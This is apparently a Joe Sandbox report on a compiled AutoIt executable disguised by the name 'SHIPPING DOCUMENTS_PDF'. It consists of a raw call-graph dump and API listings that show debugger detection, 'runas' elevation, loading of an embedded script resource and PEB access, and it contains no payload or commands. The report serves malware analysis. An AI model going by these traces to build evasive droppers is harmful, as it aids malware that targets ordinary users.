106745->106765 106767 b5a057 106745->106767 106770 b59f37 Mailbox 106745->106770 106774 b70db6 59 API calls Mailbox 106745->106774 106775 b5b2b6 106745->106775 106776 b59ea0 331 API calls 106745->106776 106778 b9086a 106745->106778 106780 b90878 106745->106780 106782 b9085c 106745->106782 106783 b5b21c 106745->106783 106786 ba6e8f 59 API calls 106745->106786 106788 bc445a 331 API calls 106745->106788 106790 bcdf23 106745->106790 106795 b59c90 59 API calls Mailbox 106745->106795 106799 bcc193 85 API calls 2 library calls 106745->106799 106800 bcc2e0 96 API calls Mailbox 106745->106800 106801 bb7956 59 API calls Mailbox 106745->106801 106802 bcbc6b 331 API calls Mailbox 106745->106802 106803 ba617e 59 API calls Mailbox 106745->106803 106805 bb9e4a 89 API calls 4 library calls 106746->106805 106749 b909e5 106811 bb9e4a 89 API calls 4 library calls 106749->106811 106750 b90055 106804 bb9e4a 89 API calls 4 library calls 106750->106804 106753 b70db6 59 API calls Mailbox 106753->106770 106755 b5b475 106758 b58047 59 API calls 106755->106758 106756 b90064 106757 b58047 59 API calls 106757->106770 106758->106767 106762 b57667 59 API calls 106762->106770 106763 b5b47a 106763->106749 106763->106750 106764 ba6e8f 59 API calls 106764->106770 106765->106745 106766 b72d40 67 API calls __cinit 106766->106770 106768 b909d6 106810 bb9e4a 89 API calls 4 library calls 106768->106810 106770->106750 106770->106753 106770->106755 106770->106757 106770->106762 106770->106763 106770->106764 106770->106766 106770->106767 106770->106768 106771 b5a55a 106770->106771 106793 b5c8c0 331 API calls 2 library calls 106770->106793 106794 b5b900 60 API calls Mailbox 106770->106794 106809 bb9e4a 89 API calls 4 library calls 106771->106809 106774->106745 106798 b5f6a3 331 API calls 106775->106798 106776->106745 106807 b59c90 59 API calls Mailbox 106778->106807 106808 bb9e4a 89 API calls 4 library calls 106780->106808 106782->106767 106806 ba617e 59 API calls Mailbox 106782->106806 106796 b59d3c 60 API calls Mailbox 106783->106796 106785 b5b22d 106797 b59d3c 60 API calls Mailbox 106785->106797 106786->106745 106788->106745 106812 bccadd 106790->106812 106792 bcdf33 106792->106745 106793->106770 106794->106770 106795->106745 106796->106785 106797->106775 106798->106746 106799->106745 106800->106745 106801->106745 106802->106745 106803->106745 106804->106756 106805->106782 106806->106767 106807->106782 106808->106782 106809->106767 106810->106749 106811->106767 106813 b59837 84 API calls 106812->106813 106814 bccb1a 106813->106814 106833 bccb61 Mailbox 106814->106833 106850 bcd7a5 106814->106850 106816 bccdb9 106817 bccf2e 106816->106817 106821 bccdc7 106816->106821 106889 bcd8c8 92 API calls Mailbox 106817->106889 106820 bccf3d 106820->106821 106823 bccf49 106820->106823 106863 bcc96e 106821->106863 106822 b59837 84 API calls 106841 bccbb2 Mailbox 106822->106841 106823->106833 106828 bcce00 106878 b70c08 106828->106878 106831 bcce1a 106884 bb9e4a 89 API calls 4 library calls 106831->106884 106832 bcce33 106834 b592ce 59 API calls 106832->106834 106833->106792 106836 bcce3f 106834->106836 106838 b59050 59 API calls 106836->106838 106837 bcce25 GetCurrentProcess TerminateProcess 106837->106832 106839 bcce55 106838->106839 106849 bcce7c 106839->106849 106885 b58d40 59 API calls Mailbox 106839->106885 106841->106816 106841->106822 106841->106833 106882 bcfbce 59 API calls 2 library calls 106841->106882 106883 bccfdf 61 API calls 2 library calls 106841->106883 106842 bccfa4 106842->106833 106846 bccfb8 FreeLibrary 106842->106846 106843 bcce6b 106886 bcd649 107 API calls _free 106843->106886 106846->106833 106849->106842 106887 b58d40 59 API calls Mailbox 106849->106887 106888 b59d3c 60 API calls Mailbox 106849->106888 106890 bcd649 107 API calls _free 106849->106890 106851 b57e4f 59 API calls 106850->106851 106852 bcd7c0 CharLowerBuffW 106851->106852 106891 baf167 106852->106891 106856 b57667 59 API calls 106857 bcd7f9 106856->106857 106858 b5784b 59 API calls 106857->106858 106859 bcd810 106858->106859 106860 b57d2c 59 API calls 106859->106860 106861 bcd81c Mailbox 106860->106861 106862 bcd858 Mailbox 106861->106862 106898 bccfdf 61 API calls 2 library calls 106861->106898 106862->106841 106864 bcc9de 106863->106864 106865 bcc989 106863->106865 106869 bcda50 106864->106869 106866 b70db6 Mailbox 59 API calls 106865->106866 106868 bcc9ab 106866->106868 106867 b70db6 Mailbox 59 API calls 106867->106868 106868->106864 106868->106867 106870 bcdc79 Mailbox 106869->106870 106877 bcda73 _strcat _wcscpy __wsetenvp 106869->106877 106870->106828 106871 b59b98 59 API calls 106871->106877 106872 b59be6 59 API calls 106872->106877 106873 b59b3c 59 API calls 106873->106877 106874 b59837 84 API calls 106874->106877 106875 b7571c 58 API calls __malloc_crt 106875->106877 106877->106870 106877->106871 106877->106872 106877->106873 106877->106874 106877->106875 106901 bb5887 61 API calls 2 library calls 106877->106901 106879 b70c1d 106878->106879 106880 b70cb5 CallWindowProcA 106879->106880 106881 b70c83 106879->106881 106880->106881 106881->106831 106881->106832 106882->106841 106883->106841 106884->106837 106885->106843 106886->106849 106887->106849 106888->106849 106889->106820 106890->106849 106893 baf192 __wsetenvp 106891->106893 106892 baf1d1 106892->106856 106892->106861 106893->106892 106894 baf278 106893->106894 106895 baf1c7 106893->106895 106894->106892 106900 b578c4 61 API calls 106894->106900 106895->106892 106899 b578c4 61 API calls 106895->106899 106898->106862 106899->106895 106900->106894 106901->106877 106902 b53633 106903 b5366a 106902->106903 106904 b536e7 106903->106904 106905 b53688 106903->106905 106943 b536e5 106903->106943 106907 b8d0cc 106904->106907 106908 b536ed 106904->106908 106909 b53695 106905->106909 106910 b5374b PostQuitMessage 106905->106910 106906 b536ca DefWindowProcW 106911 b536d8 106906->106911 106951 b61070 10 API calls Mailbox 106907->106951 106912 b53715 SetTimer RegisterWindowMessageW 106908->106912 106913 b536f2 106908->106913 106915 b536a0 106909->106915 106916 b8d154 106909->106916 106910->106911 106912->106911 106920 b5373e CreatePopupMenu 106912->106920 106917 b8d06f 106913->106917 106918 b536f9 KillTimer 106913->106918 106921 b53755 106915->106921 106922 b536a8 106915->106922 106956 bb2527 71 API calls _memset 106916->106956 106925 b8d0a8 MoveWindow 106917->106925 106926 b8d074 106917->106926 106947 b5443a Shell_NotifyIconW _memset 106918->106947 106919 b8d0f3 106952 b61093 331 API calls Mailbox 106919->106952 106920->106911 106949 b544a0 64 API calls _memset 106921->106949 106929 b8d139 106922->106929 106930 b536b3 106922->106930 106925->106911 106933 b8d078 106926->106933 106934 b8d097 SetFocus 106926->106934 106929->106906 106955 ba7c36 59 API calls Mailbox 106929->106955 106936 b536be 106930->106936 106937 b8d124 106930->106937 106931 b8d166 106931->106906 106931->106911 106932 b53764 106932->106911 106933->106936 106938 b8d081 106933->106938 106934->106911 106935 b5370c 106948 b53114 DeleteObject DestroyWindow Mailbox 106935->106948 106936->106906 106953 b5443a Shell_NotifyIconW _memset 106936->106953 106954 bb2d36 81 API calls _memset 106937->106954 106950 b61070 10 API calls Mailbox 106938->106950 106943->106906 106945 b8d118 106946 b5434a 68 API calls 106945->106946 106946->106943 106947->106935 106948->106911 106949->106932 106950->106911 106951->106919 106952->106936 106953->106945 106954->106932 106955->106943 106956->106931 106957 bb8d0d 106958 bb8d1a 106957->106958 106959 bb8d20 106957->106959 106960 b72d55 _free 58 API calls 106958->106960 106961 b72d55 _free 58 API calls 106959->106961 106962 bb8d31 106959->106962 106960->106959 106961->106962 106963 bb8d43 106962->106963 106964 b72d55 _free 58 API calls 106962->106964 106964->106963 106965 b9416f 106969 ba5fe6 106965->106969 106967 b9417a 106968 ba5fe6 85 API calls 106967->106968 106968->106967 106970 ba6020 106969->106970 106975 ba5ff3 106969->106975 106970->106967 106971 ba6022 106981 b59328 84 API calls Mailbox 106971->106981 106972 ba6027 106974 b59837 84 API calls 106972->106974 106976 ba602e 106974->106976 106975->106970 106975->106971 106975->106972 106978 ba601a 106975->106978 106977 b57b2e 59 API calls 106976->106977 106977->106970 106980 b595a0 59 API calls _wcsstr 106978->106980 106980->106970 106981->106972 106982 b5107d 106987 b5708b 106982->106987 106984 b5108c 106985 b72d40 __cinit 67 API calls 106984->106985 106986 b51096 106985->106986 106988 b5709b __ftell_nolock 106987->106988 106989 b57667 59 API calls 106988->106989 106990 b57151 106989->106990 106991 b54706 61 API calls 106990->106991 106992 b5715a 106991->106992 107018 b7050b 106992->107018 106995 b57cab 59 API calls 106996 b57173 106995->106996 106997 b53f74 59 API calls 106996->106997 106998 b57182 106997->106998 106999 b57667 59 API calls 106998->106999 107000 b5718b 106999->107000 107001 b57d8c 59 API calls 107000->107001 107002 b57194 RegOpenKeyExW 107001->107002 107003 b571b6 Mailbox 107002->107003 107004 b8e8b1 RegQueryValueExW 107002->107004 107003->106984 107005 b8e8ce 107004->107005 107006 b8e943 RegCloseKey 107004->107006 107007 b70db6 Mailbox 59 API calls 107005->107007 107006->107003 107017 b8e955 _wcscat Mailbox __wsetenvp 107006->107017 107008 b8e8e7 107007->107008 107009 b5522e 59 API calls 107008->107009 107010 b8e8f2 RegQueryValueExW 107009->107010 107011 b8e90f 107010->107011 107014 b8e929 107010->107014 107012 b57bcc 59 API calls 107011->107012 107012->107014 107013 b579f2 59 API calls 107013->107017 107014->107006 107015 b57de1 59 API calls 107015->107017 107016 b53f74 59 API calls 107016->107017 107017->107003 107017->107013 107017->107015 107017->107016 107019 b81940 __ftell_nolock 107018->107019 107020 b70518 GetFullPathNameW 107019->107020 107021 b7053a 107020->107021 107022 b57bcc 59 API calls 107021->107022 107023 b57165 107022->107023 107023->106995 107024 9b12a0 107032 9b12b6 107024->107032 107025 9b1a62 107027 9b1af8 107027->107025 107037 9b2d10 GetPEB GetPEB 107027->107037 107029 9b2f00 GetPEB GetPEB 107029->107032 107032->107025 107032->107027 107032->107029 107033 9b2d10 GetPEB GetPEB 107032->107033 107034 9b2dc0 GetPEB GetPEB 107032->107034 107035 9b2910 GetPEB GetPEB 107032->107035 107036 9b2c40 GetPEB GetPEB 107032->107036 107033->107032 107034->107032 107035->107032 107036->107032 107037->107025 107038 b5b40e 107046 b6f944 107038->107046 107040 b5b424 107055 b5c5a7 107040->107055 107042 b5b44c 107043 b5a388 107042->107043 107067 bb9e4a 89 API calls 4 library calls 107042->107067 107045 b908e9 107047 b6f962 107046->107047 107048 b6f950 107046->107048 107050 b6f991 107047->107050 107051 b6f968 107047->107051 107068 b59d3c 60 API calls Mailbox 107048->107068 107069 b59d3c 60 API calls Mailbox 107050->107069 107052 b70db6 Mailbox 59 API calls 107051->107052 107054 b6f95a 107052->107054 107054->107040 107056 b57a16 59 API calls 107055->107056 107057 b5c5cc _wcscmp 107056->107057 107058 b57de1 59 API calls 107057->107058 107060 b5c600 Mailbox 107057->107060 107059 b91691 107058->107059 107061 b57b2e 59 API calls 107059->107061 107060->107042 107062 b9169c 107061->107062 107070 b5843a 68 API calls 107062->107070 107064 b916ad 107066 b916b1 Mailbox 107064->107066 107071 b59d3c 60 API calls Mailbox 107064->107071 107066->107042 107067->107045 107068->107054 107069->107054 107070->107064 107071->107066 107072 b91de4 GetTempPathW 107073 b91e01 107072->107073 107073->107073

                                                                                    Executed Functions

                                                                                    Function 00B53B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B53B68
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00B53B7A
                                                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00C152F8,00C152E0,?,?), ref: 00B53BEB
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                      • Part of subcall function 00B6092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B53C14,00C152F8,?,?,?), ref: 00B6096E
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00B53C6F
                                                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00C07770,00000010), ref: 00B8D281
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00C152F8,?,?,?), ref: 00B8D2B9
                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C04260,00C152F8,?,?,?), ref: 00B8D33F
                                                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00B8D346
                                                                                      • Part of subcall function 00B53A46: GetSysColorBrush.USER32(0000000F), ref: 00B53A50
                                                                                      • Part of subcall function 00B53A46: LoadCursorW.USER32(00000000,00007F00), ref: 00B53A5F
                                                                                      • Part of subcall function 00B53A46: LoadIconW.USER32(00000063), ref: 00B53A76
                                                                                      • Part of subcall function 00B53A46: LoadIconW.USER32(000000A4), ref: 00B53A88
                                                                                      • Part of subcall function 00B53A46: LoadIconW.USER32(000000A2), ref: 00B53A9A
                                                                                      • Part of subcall function 00B53A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B53AC0
                                                                                      • Part of subcall function 00B53A46: RegisterClassExW.USER32(?), ref: 00B53B16
                                                                                      • Part of subcall function 00B539D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B53A03
                                                                                      • Part of subcall function 00B539D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B53A24
                                                                                      • Part of subcall function 00B539D5: ShowWindow.USER32(00000000,?,?), ref: 00B53A38
                                                                                      • Part of subcall function 00B539D5: ShowWindow.USER32(00000000,?,?), ref: 00B53A41
                                                                                      • Part of subcall function 00B5434A: _memset.LIBCMT ref: 00B54370
                                                                                      • Part of subcall function 00B5434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B54415
                                                                                    Strings
                                                                                    • runas, xrefs: 00B8D33A
                                                                                    • This is a third-party compiled AutoIt script., xrefs: 00B8D279
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                    • API String ID: 529118366-3287110873
                                                                                    • Opcode ID: 367b2e76a384c410fd6f9c2522c46e13d6e3198899d87bd29ffa8f9fc6aa8dcf
                                                                                    • Instruction ID: f2358336adf61647857a3442c2a1330213cf40bb9ebeca1fb73897be9766e568
                                                                                    • Opcode Fuzzy Hash: 367b2e76a384c410fd6f9c2522c46e13d6e3198899d87bd29ffa8f9fc6aa8dcf
                                                                                    • Instruction Fuzzy Hash: E651D771E48209EADF11EBB4DC55BED7BF4EB46741F0080E6F811A32A1DA705649CB21
                                                                                    Function 00B549A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 942 b549a0-b54a00 call b57667 GetVersionExW call b57bcc 947 b54a06 942->947 948 b54b0b-b54b0d 942->948 949 b54a09-b54a0e 947->949 950 b8d767-b8d773 948->950 952 b54a14 949->952 953 b54b12-b54b13 949->953 951 b8d774-b8d778 950->951 954 b8d77a 951->954 955 b8d77b-b8d787 951->955 956 b54a15-b54a4c call b57d2c call b57726 952->956 953->956 954->955 955->951 957 b8d789-b8d78e 955->957 965 b54a52-b54a53 956->965 966 b8d864-b8d867 956->966 957->949 959 b8d794-b8d79b 957->959 959->950 961 b8d79d 959->961 964 b8d7a2-b8d7a5 961->964 967 b8d7ab-b8d7c9 964->967 968 b54a93-b54aaa GetCurrentProcess IsWow64Process 964->968 965->964 969 b54a59-b54a64 965->969 970 b8d869 966->970 971 b8d880-b8d884 966->971 967->968 974 b8d7cf-b8d7d5 967->974 972 b54aac 968->972 973 b54aaf-b54ac0 968->973 975 b8d7ea-b8d7f0 969->975 976 b54a6a-b54a6c 969->976 977 b8d86c 970->977 978 b8d86f-b8d878 971->978 979 b8d886-b8d88f 971->979 972->973 981 b54ac2-b54ad2 call b54b37 973->981 982 b54b2b-b54b35 GetSystemInfo 973->982 983 b8d7df-b8d7e5 974->983 984 b8d7d7-b8d7da 974->984 987 b8d7fa-b8d800 975->987 988 b8d7f2-b8d7f5 975->988 985 b54a72-b54a75 976->985 986 b8d805-b8d811 976->986 977->978 978->971 979->977 980 b8d891-b8d894 979->980 980->978 999 b54ad4-b54ae1 call b54b37 981->999 1000 b54b1f-b54b29 GetSystemInfo 981->1000 989 b54af8-b54b08 982->989 983->968 984->968 993 b8d831-b8d834 985->993 994 b54a7b-b54a8a 985->994 990 b8d81b-b8d821 986->990 991 b8d813-b8d816 986->991 987->968 988->968 990->968 991->968 993->968 996 b8d83a-b8d84f 993->996 997 b54a90 994->997 998 b8d826-b8d82c 994->998 1001 b8d859-b8d85f 996->1001 1002 b8d851-b8d854 996->1002 997->968 998->968 1007 b54ae3-b54ae7 GetNativeSystemInfo 999->1007 1008 b54b18-b54b1d 999->1008 1003 b54ae9-b54aed 1000->1003 1001->968 1002->968 1003->989 1006 b54aef-b54af2 FreeLibrary 1003->1006 1006->989 1007->1003 1008->1007
                                                                                    APIs
                                                                                    • GetVersionExW.KERNEL32(?), ref: 00B549CD
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    • GetCurrentProcess.KERNEL32(?,00BDFAEC,00000000,00000000,?), ref: 00B54A9A
                                                                                    • IsWow64Process.KERNEL32(00000000), ref: 00B54AA1
                                                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00B54AE7
                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00B54AF2
                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00B54B23
                                                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00B54B2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 1986165174-0
                                                                                    • Opcode ID: 803cc04bc12acc17a2b111921a0e5f12c3ac9a6248dd6b322a6dd348ac618f33
                                                                                    • Instruction ID: 13d948d2faf39dfa44346c496186d2508432f5bf0d5d287b6e7a90111d17d41d
                                                                                    • Opcode Fuzzy Hash: 803cc04bc12acc17a2b111921a0e5f12c3ac9a6248dd6b322a6dd348ac618f33
                                                                                    • Instruction Fuzzy Hash: 6991E43198E7C1DEC731DB6894902AAFFF5AF2A305B0449EED4CB93A41D720A94CC759
                                                                                    Function 00B54E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1009 b54e89-b54ea1 CreateStreamOnHGlobal 1010 b54ec1-b54ec6 1009->1010 1011 b54ea3-b54eba FindResourceExW 1009->1011 1012 b54ec0 1011->1012 1013 b8d933-b8d942 LoadResource 1011->1013 1012->1010 1013->1012 1014 b8d948-b8d956 SizeofResource 1013->1014 1014->1012 1015 b8d95c-b8d967 LockResource 1014->1015 1015->1012 1016 b8d96d-b8d98b 1015->1016 1016->1012
                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00B54D8E,?,?,00000000,00000000), ref: 00B54E99
                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00B54D8E,?,?,00000000,00000000), ref: 00B54EB0
                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00B54D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B54E2F), ref: 00B8D937
                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00B54D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B54E2F), ref: 00B8D94C
                                                                                    • LockResource.KERNEL32(00B54D8E,?,?,00B54D8E,?,?,00000000,00000000,?,?,?,?,?,?,00B54E2F,00000000), ref: 00B8D95F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                    • String ID: SCRIPT
                                                                                    • API String ID: 3051347437-3967369404
                                                                                    • Opcode ID: d27da2dbde1cd6160a86f5042ebacd12cfed8c1fa385aec243d18a43237c4ce5
                                                                                    • Instruction ID: f9c6467a54eea3498d31bc3bf770d0c945514534443778d9f6e6d3d93c6a3b7b
                                                                                    • Opcode Fuzzy Hash: d27da2dbde1cd6160a86f5042ebacd12cfed8c1fa385aec243d18a43237c4ce5
                                                                                    • Instruction Fuzzy Hash: F4119E70200701BFD7258B65EC49F37BBFAFBC5B11F1482ADF80686260EB61E8448A60
                                                                                    Function 00BB445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,00B8E398), ref: 00BB446A
                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00BB447B
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BB448B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFind$AttributesCloseFirst
                                                                                    • String ID:
                                                                                    • API String ID: 48322524-0
                                                                                    • Opcode ID: 7dd5904be97a56a07406d824fd865882563f7b46c3c0ed82448e8e063369b432
                                                                                    • Instruction ID: ec07c44c86e87c5da325d1d17042b70774d1bec61969d29a2a6664219b07f6a0
                                                                                    • Opcode Fuzzy Hash: 7dd5904be97a56a07406d824fd865882563f7b46c3c0ed82448e8e063369b432
                                                                                    • Instruction Fuzzy Hash: 5EE0D8324155016B42106B38EC4D4F9B79CEE05335F100766F836C21D0FFB459109595
                                                                                    Function 00B5E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • Variable must be of type 'Object'., xrefs: 00B93E62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                    • API String ID: 0-109567571
                                                                                    • Opcode ID: 95362c453687eaf20404d28accea306a5eea7ed83f71af438bbaa924c85081a8
                                                                                    • Instruction ID: c73962270b3dc49f4fe5b9f3d542a5e30ff62e523e508ce6c5a4d4e2ab4b60e4
                                                                                    • Opcode Fuzzy Hash: 95362c453687eaf20404d28accea306a5eea7ed83f71af438bbaa924c85081a8
                                                                                    • Instruction Fuzzy Hash: 54A24975A00205CBCB28CF54C480BAAB7F2FB59311F6480E9ED25AB351D775EE4ACB91
                                                                                    Function 00B609D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B60A5B
                                                                                    • timeGetTime.WINMM ref: 00B60D16
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B60E53
                                                                                    • Sleep.KERNEL32(0000000A), ref: 00B60E61
                                                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00B60EFA
                                                                                    • DestroyWindow.USER32 ref: 00B60F06
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B60F20
                                                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00B94E83
                                                                                    • TranslateMessage.USER32(?), ref: 00B95C60
                                                                                    • DispatchMessageW.USER32(?), ref: 00B95C6E
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B95C82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                    • API String ID: 4212290369-3242690629
                                                                                    • Opcode ID: 7ebea4a31a849b12552440af26827e0c0f98ffb2783e6fac36d33630f0ea43a2
                                                                                    • Instruction ID: 3113808b4cc884c5e4316c7baa4c015fc4087e75e14ff2311b3a452a995ed691
                                                                                    • Opcode Fuzzy Hash: 7ebea4a31a849b12552440af26827e0c0f98ffb2783e6fac36d33630f0ea43a2
                                                                                    • Instruction Fuzzy Hash: 51B2D170608741DFDB35DF24C884BAAB7E4FF85304F1489ADE99A972A1DB74E844CB42
                                                                                    Function 00BB9155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
